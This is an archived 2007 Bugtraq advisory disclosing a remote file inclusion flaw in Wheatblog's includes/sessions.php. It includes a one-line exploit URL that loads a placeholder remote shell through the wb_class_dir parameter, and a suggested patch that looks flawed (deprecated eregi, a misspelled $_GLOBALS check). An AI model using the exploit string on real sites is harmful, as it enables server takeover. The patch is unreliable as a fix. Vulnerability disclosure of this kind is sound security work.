lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20071122093005.23597.qmail@securityfocus.com>
Date: 22 Nov 2007 09:30:05 -0000
From: security@...or.net
To: bugtraq@...urityfocus.com
Subject: Wheatblog (wB) Remote File inclusion ..

Hello,,

Wheatblog (wB) Remote File inclusion ..

tested on 1.1 and older versions are injected

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@...or.net

Remote File Inclusion
file : includes/sessions.php

line 2 :
code:-
include_once("$wb_class_dir/classDatabase.php");

variable wb_class_dir can be controlled and edited to be included from remote ..

Solution

replace
code :-
include_once("$wb_class_dir/classDatabase.php");

with
code:-
// Protected By : HACKERS PAL
// Security@...or.net
// Http://WwW.SoQoR.NeT

if(eregi("sessions.php",$PHP_SELF) || isset($_GLOBALS['wb_class_dir']))
{
 die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>");
}
include_once("$wb_class_dir/classDatabase.php");


Exploit : -
includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?

#WwW.SoQoR.NeT

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ